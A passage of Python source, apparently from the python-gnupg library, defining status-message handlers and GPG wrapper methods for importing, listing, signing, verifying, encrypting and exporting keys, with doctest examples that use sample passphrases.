"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key in ("IMPORTED", "KEY_CONSIDERED"):
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM": # pragma: no cover
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i, count in enumerate(self.counts):
setattr(self, count, int(import_res[i]))
elif key == "KEYEXPIRED": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
elif key == "FAILURE": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Other failure'})
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
def summary(self):
l = []
l.append('%d imported' % self.imported)
if self.not_imported: # pragma: no cover
l.append('%d not imported' % self.not_imported)
return ', '.join(l)
ESCAPE_PATTERN = re.compile(r'\\x([0-9a-f][0-9a-f])', re.I)
BASIC_ESCAPES = {
r'\n': '\n',
r'\r': '\r',
r'\f': '\f',
r'\v': '\v',
r'\b': '\b',
r'\0': '\0',
}
class SendResult(object):
def __init__(self, gpg):
self.gpg = gpg
def handle_status(self, key, value):
logger.debug('SendResult: %s: %s', key, value)
def _set_fields(target, fieldnames, args):
for i, var in enumerate(fieldnames):
if i < len(args):
target[var] = args[i]
else:
target[var] = 'unavailable'
class SearchKeys(list):
''' Handle status messages for --search-keys.
Handle pub and uid (relating the latter to the former).
Don't care about the rest
'''
UID_INDEX = 1
FIELDS = 'type keyid algo length date expires'.split()
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def get_fields(self, args):
result = {}
_set_fields(result, self.FIELDS, args)
result['uids'] = []
result['sigs'] = []
return result
def pub(self, args):
self.curkey = curkey = self.get_fields(args)
self.append(curkey)
def uid(self, args):
uid = args[self.UID_INDEX]
uid = ESCAPE_PATTERN.sub(lambda m: chr(int(m.group(1), 16)), uid)
for k, v in BASIC_ESCAPES.items():
uid = uid.replace(k, v)
self.curkey['uids'].append(uid)
self.uids.append(uid)
def handle_status(self, key, value): # pragma: no cover
pass
class ListKeys(SearchKeys):
''' Handle status messages for --list-keys, --list-sigs.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
UID_INDEX = 9
FIELDS = 'type trust length algo keyid date expires dummy ownertrust uid sig cap issuer flag token hash curve compliance updated origin'.split()
def __init__(self, gpg):
super(ListKeys, self).__init__(gpg)
self.in_subkey = False
self.key_map = {}
def key(self, args):
self.curkey = curkey = self.get_fields(args)
if curkey['uid']:
curkey['uids'].append(curkey['uid'])
del curkey['uid']
curkey['subkeys'] = []
self.append(curkey)
self.in_subkey = False
pub = sec = key
def fpr(self, args):
fp = args[9]
if fp in self.key_map: # pragma: no cover
raise ValueError('Unexpected fingerprint collision: %s' % fp)
if not self.in_subkey:
self.curkey['fingerprint'] = fp
self.fingerprints.append(fp)
self.key_map[fp] = self.curkey
else:
self.curkey['subkeys'][-1].append(fp)
self.key_map[fp] = self.curkey
def _collect_subkey_info(self, curkey, args):
info_map = curkey.setdefault('subkey_info', {})
info = {}
_set_fields(info, self.FIELDS, args)
info_map[args[4]] = info
def sub(self, args):
# See issue #81. We create a dict with more information about
# subkeys, but for backward compatibility reason, have to add it in
# as a separate entry 'subkey_info'
subkey = [args[4], args[11]] # keyid, type
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
def ssb(self, args):
subkey = [args[4], None] # keyid, type
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
def sig(self, args):
# keyid, uid, sigclass
self.curkey['sigs'].append((args[4], args[9], args[10]))
class ScanKeys(ListKeys):
''' Handle status messages for --with-fingerprint.'''
def sub(self, args):
# --with-fingerprint --with-colons somehow outputs fewer colons,
# use the last value args[-1] instead of args[11]
subkey = [args[4], args[-1]]
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
class TextHandler(object):
def _as_text(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
if _py3k:
__str__ = _as_text
else:
__unicode__ = _as_text
def __str__(self):
return self.data
class Crypt(Verify, TextHandler):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
self.key_id = None
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key == "NODATA":
self.status = "no data was provided"
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED", "NEED_PASSPHRASE_PIN"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP": # pragma: no cover
self.status = 'invalid recipient'
elif key == "KEYEXPIRED": # pragma: no cover
self.status = 'key expired'
elif key == "SIG_CREATED": # pragma: no cover
self.status = 'sig created'
elif key == "SIGEXPIRED": # pragma: no cover
self.status = 'sig expired'
elif key == "ENC_TO": # pragma: no cover
# ENC_TO <long_keyid> <keytype> <keylength>
self.key_id = value.split(' ', 1)[0]
elif key in ("USERID_HINT", "GOODMDC",
"END_DECRYPTION", "CARDCTRL", "BADMDC",
"SC_OP_FAILURE", "SC_OP_SUCCESS",
"PINENTRY_LAUNCHED", "KEY_CONSIDERED"):
pass
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"): # pragma: no cover
logger.warning('potential problem: %s: %s', key, value)
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
elif key in ("PROGRESS", "GOOD_PASSPHRASE", "KEY_NOT_CREATED"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
class ExportResult(GenKey):
"""Handle status messages for --export[-secret-key].
For now, just use an existing class to base it on - if needed, we
can override handle_status for more specific message handling.
"""
def handle_status(self, key, value):
if key in ("EXPORTED", "EXPORT_RES"):
pass
else:
super(ExportResult, self).handle_status(key, value)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambiguous specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM": # pragma: no cover
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
def __nonzero__(self):
return self.status == 'ok'
__bool__ = __nonzero__
class Sign(TextHandler):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.hash_algo = None
self.fingerprint = None
self.status = None
self.key_id = None
self.username = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("WARNING", "ERROR", "FAILURE"): # pragma: no cover
logger.warning('potential problem: %s: %s', key, value)
elif key in ("KEYEXPIRED", "SIGEXPIRED"): # pragma: no cover
self.status = 'key expired'
elif key == "KEYREVOKED": # pragma: no cover
self.status = 'key revoked'
elif key == "SIG_CREATED":
(self.type,
algo, self.hash_algo, cls, self.timestamp, self.fingerprint
) = value.split()
self.status = 'signature created'
elif key == "USERID_HINT": # pragma: no cover
self.key_id, self.username = value.split(' ', 1)
elif key == "BAD_PASSPHRASE":
self.status = 'bad passphrase'
elif key in ("NEED_PASSPHRASE", "GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
VERSION_RE = re.compile(r'gpg \(GnuPG(?:/MacGPG2)?\) (\d+(\.\d+)*)'.encode('ascii'), re.I)
HEX_DIGITS_RE = re.compile(r'[0-9a-f]+$', re.I)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'send': SendResult,
'list': ListKeys,
'scan': ScanKeys,
'search': SearchKeys,
'sign': Sign,
'verify': Verify,
'export': ExportResult,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None, options=None,
secret_keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use, or list of such
keyrings. If specified, the default keyring is not used.
options =-- a list of additional options to pass to the GPG binary.
secret_keyring -- name of alternative secret keyring file to use, or
list of such keyrings.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
if keyring:
# Allow passing a string or another iterable. Make it uniformly
# a list of keyring filenames
if isinstance(keyring, string_types):
keyring = [keyring]
self.keyring = keyring
if secret_keyring:
# Allow passing a string or another iterable. Make it uniformly
# a list of keyring filenames
if isinstance(secret_keyring, string_types):
secret_keyring = [secret_keyring]
self.secret_keyring = secret_keyring
self.verbose = verbose
self.use_agent = use_agent
if isinstance(options, str): # pragma: no cover
options = [options]
self.options = options
self.on_data = None # or a callable - will be called with data chunks
# Changed in 0.3.7 to use Latin-1 encoding rather than
# locale.getpreferredencoding falling back to sys.stdin.encoding
# falling back to utf-8, because gpg itself uses latin-1 as the default
# encoding.
self.encoding = 'latin-1'
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
try:
p = self._open_subprocess(["--version"])
except OSError:
msg = 'Unable to run gpg (%s) - it may not be available.' % self.gpgbinary
logger.exception(msg)
raise OSError(msg)
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0: # pragma: no cover
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
m = VERSION_RE.match(result.data)
if not m: # pragma: no cover
self.version = None
else:
dot = '.'.encode('ascii')
self.version = tuple([int(s) for s in m.groups()[0].split(dot)])
def make_args(self, args, passphrase):
"""
Make a list of command line elements for GPG. The value of ``args``
will be appended. The ``passphrase`` argument needs to be True if
a passphrase will be sent to GPG, else False.
"""
cmd = [self.gpgbinary, '--status-fd', '2', '--no-tty', '--no-verbose']
if 'DEBUG_IPC' in os.environ:
cmd.extend(['--debug', 'ipc'])
if passphrase and hasattr(self, 'version'):
if self.version >= (2, 1):
cmd[1:1] = ['--pinentry-mode', 'loopback']
cmd.extend(['--fixed-list-mode', '--batch', '--with-colons'])
if self.gnupghome:
cmd.extend(['--homedir', no_quote(self.gnupghome)])
if self.keyring:
cmd.append('--no-default-keyring')
for fn in self.keyring:
cmd.extend(['--keyring', no_quote(fn)])
if self.secret_keyring:
for fn in self.secret_keyring:
cmd.extend(['--secret-keyring', no_quote(fn)])
if passphrase:
cmd.extend(['--passphrase-fd', '0'])
if self.use_agent: # pragma: no cover
cmd.append('--use-agent')
if self.options:
cmd.extend(self.options)
cmd.extend(args)
return cmd
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
# def debug_print(cmd):
# result = []
# for c in cmd:
# if ' ' not in c:
# result.append(c)
# else:
# if '"' not in c:
# result.append('"%s"' % c)
# elif "'" not in c:
# result.append("'%s'" % c)
# else:
# result.append(c) # give up
# return ' '.join(cmd)
from subprocess import list2cmdline as debug_print
cmd = self.make_args(args, passphrase)
if self.verbose: # pragma: no cover
print(debug_print(cmd))
if not STARTUPINFO:
si = None
else: # pragma: no cover
si = STARTUPINFO()
si.dwFlags = STARTF_USESHOWWINDOW
si.wShowWindow = SW_HIDE
result = Popen(cmd, shell=False, stdin=PIPE, stdout=PIPE, stderr=PIPE,
startupinfo=si)
logger.debug("%s: %s", result.pid, debug_print(cmd))
return result
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose: # pragma: no cover
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result, on_data=None):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if on_data:
on_data(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result, self.on_data))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError: # pragma: no cover
pass
stderr.close()
stdout.close()
def _handle_io(self, args, fileobj, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary: # pragma: no cover
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(fileobj, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def set_output_without_confirmation(self, args, output):
"If writing to a file which exists, avoid a confirmation message."
if os.path.exists(output):
# We need to avoid an overwrite confirmation message
args.extend(['--yes'])
args.extend(['--output', no_quote(output)])
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False, output=None, extra_args=None):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary: # pragma: no cover
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.extend(['--default-key', no_quote(keyid)])
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if extra_args:
args.extend(extra_args)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError: # pragma: no cover
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
def verify(self, data, **kwargs):
"""Verify the signature on the contents of the string 'data'
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f, **kwargs)
f.close()
return result
def verify_file(self, file, data_filename=None, close_file=True, extra_args=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if extra_args:
args.extend(extra_args)
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
if close_file:
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(no_quote(fn))
args.append(no_quote(data_filename))
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
def verify_data(self, sig_filename, data, extra_args=None):
"Verify the signature in sig_filename against data in memory"
logger.debug('verify_data: %r, %r ...', sig_filename, data[:16])
result = self.result_map['verify'](self)
args = ['--verify']
if extra_args:
args.extend(extra_args)
args.extend([no_quote(sig_filename), '-'])
stream = _make_memory_stream(data)
self._handle_io(args, stream, result, binary=True)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
"""
Import the key_data into our keyring.
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> os.chmod('keys', 0x1C0)
>>> result = gpg.recv_keys('pgp.mit.edu', '92905378')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', no_quote(keyserver), '--recv-keys']
args.extend([no_quote(k) for k in keyids])
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def send_keys(self, keyserver, *keyids):
"""Send a key to a keyserver.
Note: it's not practical to test this function without sending
arbitrary data to live keyservers.
"""
result = self.result_map['send'](self)
logger.debug('send_keys: %r', keyids)
data = _make_binary_stream('', self.encoding)
#data = ""
args = ['--keyserver', no_quote(keyserver), '--send-keys']
args.extend([no_quote(k) for k in keyids])
self._handle_io(args, data, result, binary=True)
logger.debug('send_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False, passphrase=None,
expect_passphrase=True):
"""
Delete the indicated keys.
Since GnuPG 2.1, you can't delete secret keys without providing a
passphrase. However, if you're expecting the passphrase to go to gpg
via pinentry, you should specify expect_passphrase=False. (It's only
checked for GnuPG >= 2.1).
"""
which='key'
if secret: # pragma: no cover
if (self.version >= (2, 1) and passphrase is None and
expect_passphrase):
raise ValueError('For GnuPG >= 2.1, deleting secret keys '
'needs a passphrase to be provided')
which='secret-key'
if _is_sequence(fingerprints): # pragma: no cover
fingerprints = [no_quote(s) for s in fingerprints]
else:
fingerprints = [no_quote(fingerprints)]
args = ['--delete-%s' % which]
args.extend(fingerprints)
result = self.result_map['delete'](self)
if not secret or self.version < (2, 1):
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
else:
# Need to send in a passphrase.
f = _make_binary_stream('', self.encoding)
try:
self._handle_io(args, f, result, passphrase=passphrase,
binary=True)
finally:
f.close()
return result
def export_keys(self, keyids, secret=False, armor=True, minimal=False,
passphrase=None, expect_passphrase=True):
"""
Export the indicated keys. A 'keyid' is anything gpg accepts.
Since GnuPG 2.1, you can't export secret keys without providing a
passphrase. However, if you're expecting the passphrase to go to gpg
via pinentry, you should specify expect_passphrase=False. (It's only
checked for GnuPG >= 2.1).
"""
which=''
if secret:
which='-secret-key'
if (self.version >= (2, 1) and passphrase is None and
expect_passphrase):
raise ValueError('For GnuPG >= 2.1, exporting secret keys '
'needs a passphrase to be provided')
if _is_sequence(keyids):
keyids = [no_quote(k) for k in keyids]
else:
keyids = [no_quote(keyids)]
args = ['--export%s' % which]
if armor:
args.append('--armor')
if minimal: # pragma: no cover
args.extend(['--export-options','export-minimal'])
args.extend(keyids)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['export'](self)
if not secret or self.version < (2, 1):
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
else:
# Need to send in a passphrase.
f = _make_binary_stream('', self.encoding)
try:
self._handle_io(args, f, result, passphrase=passphrase,
binary=True)
finally:
f.close()
logger.debug('export_keys result: %r', result.data)
# Issue #49: Return bytes if armor not specified, else text
result = result.data
if armor:
result = result.decode(self.encoding, self.decode_errors)
return result
def _get_list_output(self, p, kind):
# Get the response information
result = self.result_map[kind](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr sub ssb sig'.split()
for line in lines:
if self.verbose: # pragma: no cover
print(line)
logger.debug("line: %r", line.rstrip())
if not line: # pragma: no cover
break
L = line.strip().split(':')
if not L: # pragma: no cover
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def list_keys(self, secret=False, keys=None, sigs=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> fp1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> fp2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert fp1 in pubkeys.fingerprints
>>> assert fp2 in pubkeys.fingerprints
"""
if sigs:
which = 'sigs'
else: which='keys'
if secret:
which='secret-keys'
args = ['--list-%s' % which,
'--fingerprint', '--fingerprint'] # get subkey FPs, too
if keys:
if isinstance(keys, string_types):
keys = [keys]
args.extend(keys)
p = self._open_subprocess(args)
return self._get_list_output(p, 'list')
def scan_keys(self, filename):
"""
List details of an ascii armored or binary key file
without first importing it to the local keyring.
The function achieves this on modern GnuPG by running:
$ gpg --dry-run --import-options import-show --import
On older versions, it does the *much* riskier:
$ gpg --with-fingerprint --with-colons filename
"""
if self.version >= (2, 1):
args = ['--dry-run', '--import-options', 'import-show', '--import']
else:
logger.warning('Trying to list packets, but if the file is not a '
'keyring, might accidentally decrypt')
args = ['--with-fingerprint', '--with-colons', '--fixed-list-mode']
args.append(no_quote(filename))
p = self._open_subprocess(args)
return self._get_list_output(p, 'scan')
def search_keys(self, query, keyserver='pgp.mit.edu'):
""" search keyserver by query (using --search-keys option)
>>> import shutil
>>> shutil.rmtree('keys', ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome='keys')
>>> os.chmod('keys', 0x1C0)
>>> result = gpg.search_keys('<vinay_sajip@hotmail.com>')
>>> assert result, 'Failed using default keyserver'
>>> #keyserver = 'keyserver.ubuntu.com'
>>> #result = gpg.search_keys('<vinay_sajip@hotmail.com>', keyserver)
>>> #assert result, 'Failed using keyserver.ubuntu.com'
"""
query = query.strip()
if HEX_DIGITS_RE.match(query):
query = '0x' + query
args = ['--fingerprint',
'--keyserver', no_quote(keyserver), '--search-keys',
no_quote(query)]
p = self._open_subprocess(args)
# Get the response information
result = self.result_map['search'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = ['pub', 'uid']
for line in lines:
if self.verbose: # pragma: no cover
print(line)
logger.debug('line: %r', line.rstrip())
if not line: # sometimes get blank lines on Windows
continue
L = line.strip().split(':')
if not L: # pragma: no cover
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
if str(val).strip(): # skip empty strings
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',2048)
parms.setdefault('Name-Real', "Autogenerated Key")
logname = (os.environ.get('LOGNAME') or os.environ.get('USERNAME') or
'unspecified')
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False, extra_args=None):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
if symmetric:
# can't be False or None - could be True or a cipher algo value
# such as AES256
args = ['--symmetric']
if symmetric is not True:
args.extend(['--cipher-algo', no_quote(symmetric)])
# else use the default, currently CAST5
else:
if not recipients:
raise ValueError('No recipients specified with asymmetric '
'encryption')
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.extend(['--recipient', no_quote(recipient)])
if armor: # create ascii-armored output - False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if sign is True: # pragma: no cover
args.append('--sign')
elif sign: # pragma: no cover
args.extend(['--sign', '--default-key', no_quote(sign)])
if always_trust: # pragma: no cover
args.append('--always-trust')
if extra_args:
args.extend(extra_args)
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(name_email='user1@test', passphrase='pp1')
>>> result = gpg.gen_key(input)
>>> fp1 = result.fingerprint
>>> input = gpg.gen_key_input(name_email='user2@test', passphrase='pp2')
>>> result = gpg.gen_key(input)
>>> fp2 = result.fingerprint
>>> result = gpg.encrypt("hello",fp2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message, passphrase='pp2')
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again", fp1)
>>> message = str(result)
>>> result = gpg.decrypt(message, passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message, passphrase='pp1')
